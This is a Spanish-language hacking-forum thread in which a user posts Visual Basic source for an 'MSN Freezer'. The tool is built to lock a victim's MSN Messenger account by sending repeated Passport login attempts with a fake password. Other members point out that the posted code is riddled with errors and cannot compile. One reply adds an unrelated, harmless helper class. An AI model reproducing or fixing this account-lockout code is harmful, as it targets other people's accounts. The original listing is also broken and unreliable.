elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [SOURCE] [CPH] Msn Freezer
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [SOURCE] [CPH] Msn Freezer  (Leído 5,755 veces)
fary


Desconectado Desconectado

Mensajes: 1.062



Ver Perfil WWW
[SOURCE] [CPH] Msn Freezer
« en: 8 Febrero 2010, 22:46 pm »

Hola, bueno ace unos dias programe un congelador de msn desde 0... aqui os dejo el source:


Código:
'*************************************************
'****          Programado por Drinky94        ****
'*************************************************
Option Explicit
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Dim Mensaje As String
Private Sub banear_click()
    If text1 = "" Then
        MsgBox "No ha insertado ningun msn", vbExclamation, "[CPH] Msn Freezer: Error"
    Else
        If intr(text1, "@") = True Then
            WS.Close
            WS.remotehost = messenger.hotmail.com
            WS.remoteport = 1863
            WS.Connect
            Call parte1
        Else
            MsgBox "Inserte una direccion de correo valida", vbExclamation, "[CPH] Msn Freezer: Error"
    End If
End Sub
Private Sub desbanear_click()
    On Error GoTo err
    WS.Close
    WS2.Close
    WS3.Close
    timer1.Enabled = False
    MsgBox "La cuenta a sido desbloqueada con exito", vbInformation, "[CPH] Msn Freezer: La cuenta ha sido desbloqueada con exito"
err:
    MsgBox "El programa a detectado un error y debe cerrarse", vbCritical, "[CPH] Msn Freezer: Error"
    End
End Sub
Private Sub parte1()
    WS.senddata = ">>VER 1 MSNP9 MSNP8 CVR0"
End Sub
Private Sub parte2()
    WS.senddata = ">>CVR 2 0X0C0A winnt 5.1 i386 MSNMSGR 6.0.0602 MSMSGS" & text1 & ":-com"
End Sub
Private Sub parte3()
    WS.senddata = ">>USR 3 TWN I" & text1
End Sub
Private Sub parte4()
    WS2.Close
    WS2.remotehost = "207.46.106.35"
    WS2.remoteport = 1863
    Call parte5
End Sub
Private Sub parte5()
    WS2.senddata = ">>VER 4 MSNP9 MSNP8 CVR0"
End Sub
Private Sub parte6()
    WS2.senddata = ">>CVR 5 0x0409 win i386 MSNMSGR 5.0.0544 MSMSGS" & text1
End Sub
Private Sub parte7()
    WS2.senddata = ">>USR 6 TWN I" & text1
End Sub
Private Sub parte8()
    WS3.Close
    WS3.remotehost = "login.passport.com"
    WS3.remoteport = 433
    WS3.Connect
    timer1.Enabled = True
    timer1.Interval = 1000
End Sub
Private Sub timer1_timer()
    WS3.senddata = ">>GET /login2.srf HTTP/1.0 Accept: */* Host: login.pasport.com User Agent: loquesea Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmesenger%2Emsn%2Ecom,sing-in=" & text1 & ",pwd:" & "contraseñafalsaaenviartienequeserdificilparaquenuncacoincida,lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1139411464,kpp=1,kv=7,ver=2.1.6000.1,rn=NFNw1dnJ,tpf=773901fc3222b6a78f24f3f9955ca7c9"
End Sub
Private Sub WS_DataArrival(Index As Integer, ByVal bytesTotal As Long)
    Call Winsock1.GetData(Mensaje)
    Select Case mensage
        Case "<<VER 1 MSNP9 MSNP8 CVR0"
            Call parte2
        Case "<<CVR 2 7.5.0311 7.50311 6.2.0205 http://msgr.dlservicemicrosoft.com/download/e/7/5e75042c3-31c1-4b42-a458-adbc-786322fe/install_MSN_Messenger.EXE http://messenger.msn.com/es"
            Call parte3
        Case "<<XFR 3 NS 207.46.106.35:1863 0 207.46.104.20:1863"
            Call parte4
    End Select
End Sub
Private Sub WS2_DataArrival(Index As Integer, ByVal bytesTotal As Long)
    Call Winsock1.GetData(Mensaje)
    Case "<<VER 4 MSNP9 MSNP8 CVR0"
        Call parte6
    Case "<<CVR 5 6.00602 1.0.0000 http://download.microsoft.com/download/8/a/4/8a42bcae-f533-4468-b871-d2bc-8dd32e9e/SETUP9x.EXE http://messenger.msn.com"
        Call parte7
    Case "<<URS 5 TWN S lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%messenger%2Emsn%2ecom,ct=113941464,kpp=1,kv=7,ver=2.1.6000.1,rn=NFNw1dnJ,tpf=773901fc3222b6a78f24f3f9955ca7c9"
End Sub
Private Sub WS2_DataArrival(Index As Integer, ByVal bytesTotal As Long)
     Call Winsock1.GetData(Mensaje)
     Case mensage
        Call parte8
End Sub
Private Sub WS_ConnectionRequest(Index As Integer, ByVal requestID As Long)
    Winsock1.LocalPort = 0
    Winsock1.Accept requestID
End Sub
Private Sub form_load()
       With ProgressBar1
        .Max = 100
        .Min = 0
        .Value = 0
    End With
End Sub


Espero que les haya gustado...


salu2!


« Última modificación: 9 Febrero 2010, 22:43 pm por Drinky94 » En línea

Un byte a la izquierda.
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: [SOURCE] [CPH] Msn Freezer
« Respuesta #1 en: 8 Febrero 2010, 23:44 pm »

Lo has probado?? Segun veo que utilizas el MSNP es imposible que funcione :rolleyes: :rolleyes:

Porque pones los Sleep's con If's... son Sub's, osea, no devuelven nada... porque comparas que sea distinto de 0???

El codigo se puede optimizar y no estoy seguro de que sea funcional...(MOD: Imposible que funcione:)
Código:
WS.remotehost = messenger.hotmail.com
??? Has intentado probarlo?? Esto esta en nombre CPH?? :-\ :-\

Ah! Muy graciosa la forma en la que muestras el porcentaje :laugh:

PD:No pretendo ser cruel :-\


« Última modificación: 8 Febrero 2010, 23:49 pm por Karcrack » En línea

BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: [SOURCE] [CPH] Msn Freezer
« Respuesta #2 en: 9 Febrero 2010, 00:31 am »

Código:
    If Sleep(500) Then
       progressbar.Value = 20
       If Sleep(500) Then
           progressbar.Value = 40
           If Sleep(500) Then
               progressbar.Value = 60
               If Sleep(500) Then
                   progressbar.Value = 80
                   If Sleep(500) Then
                       progressbar.Value = 100
                       If Sleep(500) Then
                           MsgBox "La Cuenta ha sido bloqueada con exito", vbInformation, "[CPH] Msn Freezer: La cuenta " & text1 & " ha sido bloqueada con exito"
                        End If
                    End If
                End If
            End If
        End If
    End If

O.O!¡
En línea

The Dark Shadow is my passion.
BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: [SOURCE] [CPH] Msn Freezer
« Respuesta #3 en: 9 Febrero 2010, 01:28 am »

.
Si te sirve esto lo puedes usar, es un modulo de clase que acabo de hacer para repetir un Proceso X cantidad de Veces, mostrando a su vez el porcentaje de ejecuciones efectuadas.

Código
  1.  
  2. '
  3. ' ////////////////////////////////////////////////////////////////
  4. ' // Autor: BlackZeroX ( Ortega Avila Miguel Angel )            //
  5. ' //                                                            //
  6. ' // Web: http://InfrAngeluX.Sytes.Net/                         //
  7. ' //                                                            //
  8. ' // |-> Pueden Distribuir Este Código siempre y cuando         //
  9. ' // no se eliminen los créditos originales de este código      //
  10. ' // No importando que sea modificado/editado o engrandecido    //
  11. ' // o achicado, si es en base a este código                    //
  12. ' ////////////////////////////////////////////////////////////////
  13.  
  14. Option Base 0
  15. Option Explicit
  16.  
  17. Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
  18.  
  19. Public Event PorcentajeEjecutado(Porcentaje As String, Cancel As Boolean)
  20.  
  21. Public Function ReplicarAccion(ObjDestino As Object, NombreDeProceso As String, CantidadDeReplicas As Integer, EsperaEntreReplicas As Integer, ParamArray Argumentos() As Variant) As Variant()
  22. Dim Contador                    As Long
  23. Dim ProcesoCompletado           As String
  24. Dim Cancel                      As Boolean
  25. Dim Res()                       As Variant
  26.  
  27.    If ObjDestino Is Nothing Then Exit Function
  28.  
  29.    ReDim Res(CantidadDeReplicas - 1)
  30.  
  31.    Do: DoEvents
  32.  
  33.        If IsMissing(Argumentos) Then
  34.            Res(Contador) = CallByName(ObjDestino, NombreDeProceso, VbMethod)
  35.        Else
  36.            Res(Contador) = CallByName(ObjDestino, NombreDeProceso, VbMethod, Argumentos())
  37.        End If
  38.  
  39.        Contador = Contador + 1
  40.        ProcesoCompletado = FormatNumber(Contador * 100 / CantidadDeReplicas, 2)
  41.  
  42.  
  43.        RaiseEvent PorcentajeEjecutado(ProcesoCompletado, Cancel)
  44.        If Cancel Then Exit Do
  45.  
  46.        Call Sleep(EsperaEntreReplicas)
  47.  
  48.    Loop Until Contador = CantidadDeReplicas
  49.  
  50.    ReplicarAccion = Res
  51.  
  52. End Function
  53.  
  54.  

Ejemplificacion:

Código
  1.  
  2. '
  3. ' ////////////////////////////////////////////////////////////////
  4. ' // Autor: BlackZeroX ( Ortega Avila Miguel Angel )            //
  5. ' //                                                            //
  6. ' // Web: http://InfrAngeluX.Sytes.Net/                         //
  7. ' //                                                            //
  8. ' // |-> Pueden Distribuir Este Código siempre y cuando         //
  9. ' // no se eliminen los créditos originales de este código      //
  10. ' // No importando que sea modificado/editado o engrandecido    //
  11. ' // o achicado, si es en base a este código                    //
  12. ' ////////////////////////////////////////////////////////////////
  13. Option Base 0
  14. Option Explicit
  15.  
  16. Private WithEvents ReplicarProcesos             As ClsRepliProcess
  17.  
  18. Private Sub Form_Load()
  19.  
  20. Dim Res()                       As Variant
  21. Dim index                       As Integer
  22.  
  23.    Set ReplicarProcesos = New ClsRepliProcess
  24.  
  25.    Res = ReplicarProcesos.ReplicarAccion(Me, "HolaMundo", 75, 10)
  26.  
  27.    For index = LBound(Res) To UBound(Res)
  28.        Debug.Print Res(index)
  29.    Next index
  30.  
  31. End Sub
  32.  
  33. Public Function HolaMundo() As Long
  34.  
  35.    Randomize
  36.    HolaMundo = Rnd * 10
  37.  
  38. End Function
  39.  
  40. Private Sub ReplicarProcesos_PorcentajeEjecutado(Porcentaje As String, Cancel As Boolean)
  41.  
  42.    Debug.Print Porcentaje
  43.  
  44. End Sub
  45.  
  46. Private Sub Form_Unload(Cancel As Integer)
  47.  
  48.    Set ReplicarProcesos = Nothing
  49.  
  50. End Sub
  51.  
  52.  
En línea

The Dark Shadow is my passion.
seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: [SOURCE] [CPH] Msn Freezer
« Respuesta #4 en: 9 Febrero 2010, 01:58 am »

Espero que les haya gustado...

con todo respeto, no me gusto nada, y creo que a nadie le ha gustado.

eso no compila ni abajo del agua, tiene como 20 errores antes de compilar, eventos duplicados, nombre mal de funciones, codigo que no hace nada y mas...ahora van a salir los que dicen que nadie sale sabiendo y blabla, me van a decir de todo... ¿ pero tengo algo de razon ? por favor ...antes de hacer estas cosas que para colmo no te enseñan nada, aprender a hacer un bucle bien...si es para [CPH] postealo ahi, porque te digo sinceramente a veces me da verguenza ver estas cosas en este foro.

saludos.
En línea

ssccaann43 ©


Desconectado Desconectado

Mensajes: 792


¬¬


Ver Perfil
Re: [SOURCE] [CPH] Msn Freezer
« Respuesta #5 en: 9 Febrero 2010, 14:08 pm »

Espero que les haya gustado...

con todo respeto, no me gusto nada, y creo que a nadie le ha gustado.

eso no compila ni abajo del agua, tiene como 20 errores antes de compilar, eventos duplicados, nombre mal de funciones, codigo que no hace nada y mas...ahora van a salir los que dicen que nadie sale sabiendo y blabla, me van a decir de todo... ¿ pero tengo algo de razon ? por favor ...antes de hacer estas cosas que para colmo no te enseñan nada, aprender a hacer un bucle bien...si es para [CPH] postealo ahi, porque te digo sinceramente a veces me da verguenza ver estas cosas en este foro.

saludos.
:silbar: Y no se diga más...
En línea

- Miguel Núñez
Todos tenemos derechos a ser estupidos, pero algunos abusan de ese privilegio...
"I like ^TiFa^"
Jaixon Jax


Desconectado Desconectado

Mensajes: 859



Ver Perfil
Re: [SOURCE] [CPH] Msn Freezer
« Respuesta #6 en: 9 Febrero 2010, 14:29 pm »

 :¬¬  Como diria SolanGE: "Que Incordio XD"  :P
En línea

fary


Desconectado Desconectado

Mensajes: 1.062



Ver Perfil WWW
Re: [SOURCE] [CPH] Msn Freezer
« Respuesta #7 en: 9 Febrero 2010, 14:42 pm »

no me tomo ningun comentario a mal, gracias por decirme mis errores, intentare corregirlo.

salu2!
En línea

Un byte a la izquierda.
skapunky
Electronik Engineer &
Colaborador
***
Desconectado Desconectado

Mensajes: 3.667


www.killtrojan.net


Ver Perfil WWW
Re: [SOURCE] [CPH] Msn Freezer
« Respuesta #8 en: 9 Febrero 2010, 17:14 pm »

Citar
If Sleep(500) Then

Pero eso funciona en serio? Mas que nada que falta la comparación a  algo y seguro que no puede compilar, lo normal al acabar un programa es almenos compilarlo para ver si lo hace. El Sr Basic se está levantando de su tumba para perseguirte.

Citar
'*************************************************
'****             [CPH] Msn Freezer           ****
'****          Programado por Drinky94        ****
'****            En el año 2010 para:         ****
'****            :www.portalhacker.net        ****
'*************************************************

Ahora lo entiendo todo  :xD
En línea

Killtrojan Syslog v1.44: ENTRAR
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: [SOURCE] [CPH] Msn Freezer
« Respuesta #9 en: 9 Febrero 2010, 18:31 pm »

Que mordaz Skapunky :laugh: :laugh:
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines